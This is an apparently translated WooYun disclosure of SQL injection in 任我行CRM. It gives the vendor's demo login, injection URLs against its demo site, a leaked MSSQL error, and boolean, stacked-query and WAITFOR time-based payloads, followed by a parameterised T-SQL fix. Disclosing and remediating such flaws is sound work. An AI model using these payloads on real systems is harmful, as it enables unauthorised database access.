
Vulnerability summary

Defect ID: wooyun-2015-0102424

Vulnerability title: Low-value SQL injection in 任我行CRM

Affected vendor: 任我行CRM

Author: 路人甲

Submitted: 2015-03-20 12:58

Fixed: 2015-06-23 11:46

Published: 2015-06-23 11:46

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 10

Status: Handed over to a third-party partner (CNCERT, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or assistance contact [email protected]



Vulnerability details

Disclosure status:

2015-03-20: Details reported to the vendor, awaiting vendor handling
2015-03-25: Vendor confirmed; details disclosed to the vendor only
2015-03-28: Details opened to third-party security partners
2015-05-19: Details opened to core white hats and domain experts
2015-05-29: Details opened to regular white hats
2015-06-08: Details opened to intern white hats
2015-06-23: Details disclosed to the public

Brief description:

Detailed description:

WooYun: Several SQL injection vulnerabilities in 任我行CRM/OA
Fairly low-impact: it requires a logged-in user.
Tested against the demo instances on the official site.
demo2:demodemo
http://show.wecrm.com/xt/SystemManage/GetProductDataList/?pageIndex=1&pageSize=30&Keywords=&StyleTypeId='%23&Classification2=&Classification1=&MinPrice=0&MaxPrice=100000000&Classification3=&_=1426764545011
{"error":{"errorCode":-1,"message":"'#' 附近有语法错误。\r\n字符串 ' order by a.CreateDate desc\r\n\t\tset @intRecordCount=@@rowcount\r\n\r\n\t\tSELECT RecordCount=@intRecordCount,a.*,c.[Name] AS [Classification1Name],d.[Name] AS [Classification2Name],e.[Name] AS [Classification3Name] ,isnull(f.Name,') as DepartmentName,isnull(g.Name,') as StyleName \r\n\t\t\tFROM [CRM_Commodity] AS a\r\n\t\t\tLEFT JOIN [CRM_CommodityClassification1] AS c ON c.[ID] = a.[Classification1]\r\n\t\t\tLEFT JOIN [CRM_CommodityClassification2] AS d ON d.[ID] = a.[Classification2]\r\n\t\t\tLEFT JOIN [CRM_CommodityClassification3] AS e ON e.[ID] = a.[Classification3]\r\n\t\t\tleft JOIN [CRM_Department] AS f ON f.[TypeID] = a.[Department]\r\n\t\t\tleft JOIN [CRM_CommodityStyle] AS g ON g.[TypeID] = a.[Style] \r\n\t\t\tinner JOIN\r\n\t\t\t(SELECT TOP 30 pk\r\n\t\t\tFROM @tblPK\r\n\t\t\tWHERE id >=\r\n\t\t\t\t\t (\r\n\t\t\t\t\t SELECT ISNULL(MAX(id),0) \r\n\t\t\t\t\t FROM \r\n\t\t\t\t\t\t\t(\r\n\t\t\t\t\t\t\tSELECT TOP 1 id FROM @tblPK order by id\r\n\t\t\t\t\t\t\t) A\r\n\t\t\t\t\t )\r\n\t\t\tORDER BY id) tblPK ON a.id = tblPK.PK \r\n\t\t\t order by a.CreateDate desc\r\n\t\t\t\t\r\n\t' 后的引号不完整。","errorType":1},"value":null}
http://show.wecrm.com/xt/SystemManage/GetProductDataList/?pageIndex=1&pageSize=30&Keywords=&StyleTypeId=%'%20AND%201579=1579%20and%20'%'='&Classification2=&Classification1=&MinPrice=0&MaxPrice=100000000&Classification3=&_=1426764545011
Returned normally.
Place: GET
Parameter: StyleTypeId
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: pageIndex=1&pageSize=30&Keywords=&StyleTypeId=%' AND 1579=1579 AND '%'='&Classification2=&Classification1=&MinPrice=0&MaxPrice=100000000&Classification3=&_=1426764545011
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: pageIndex=1&pageSize=30&Keywords=&StyleTypeId=%'; WAITFOR DELAY '0:0:5'--&Classification2=&Classification1=&MinPrice=0&MaxPrice=100000000&Classification3=&_=1426764545011
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: pageIndex=1&pageSize=30&Keywords=&StyleTypeId=%' WAITFOR DELAY '0:0:5'--&Classification2=&Classification1=&MinPrice=0&MaxPrice=100000000&Classification3=&_=1426764545011
---

Proof of vulnerability:

Fairly low-impact: it requires a logged-in user.
Log in as an ordinary user, open Messages, select a message, then click Export to Notepad.
Tested against the demo instances on the official site.
demo1:demodemo

Fix recommendation:

Filter the input.
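Filtering a single parameter is fragile; the durable fix for what the leaked error text shows (a filter value spliced into dynamic T-SQL) is to keep the statement text constant and pass the value as a parameter. The following is an added illustration, not the vendor's stored procedure: the table and column names are taken from the error message, while the filter on a.[Style], the parameter type and the empty-value handling are assumptions.

```sql
-- Hypothetical reconstruction (not the vendor's code) of the pattern the
-- leaked query text exposes. Table/column names come from the error message;
-- the equality filter on a.[Style] and its NVARCHAR type are assumed.
DECLARE @StyleTypeId NVARCHAR(100) = N'%''; WAITFOR DELAY ''0:0:5''--';
DECLARE @sql NVARCHAR(MAX);

-- VULNERABLE: the request value becomes part of the statement text, so a
-- quote, a comment marker or a second statement inside it is parsed as SQL.
SET @sql = N'SELECT a.*, g.[Name] AS StyleName
             FROM [CRM_Commodity] AS a
             LEFT JOIN [CRM_CommodityStyle] AS g ON g.[TypeID] = a.[Style]
             WHERE a.[Style] = ''' + @StyleTypeId + N'''
             ORDER BY a.CreateDate DESC';
-- EXEC (@sql);  -- executing this would run the injected WAITFOR DELAY

-- FIXED: the statement text never changes; the value travels as a typed
-- parameter, so it can only be compared against the column, never parsed.
-- An empty value disables the filter, matching the original request where
-- StyleTypeId was blank (assumed behaviour).
SET @sql = N'SELECT a.*, g.[Name] AS StyleName
             FROM [CRM_Commodity] AS a
             LEFT JOIN [CRM_CommodityStyle] AS g ON g.[TypeID] = a.[Style]
             WHERE (@style IS NULL OR @style = N'''' OR a.[Style] = @style)
             ORDER BY a.CreateDate DESC';
EXEC sp_executesql @sql,
     N'@style NVARCHAR(100)',
     @style = @StyleTypeId;  -- the payload is just a string; no rows match
```

The same holds for the other concatenated filters in the leaked query (Keywords, the Classification IDs, MinPrice/MaxPrice): each should be a declared parameter of sp_executesql, with numeric ones typed as INT or DECIMAL so a non-numeric value is rejected before it reaches the database.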

Copyright notice: when reposting, credit the source 路人甲@乌云


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 7

Confirmed: 2015-03-25 11:45

Vendor reply:

Latest status:

None yet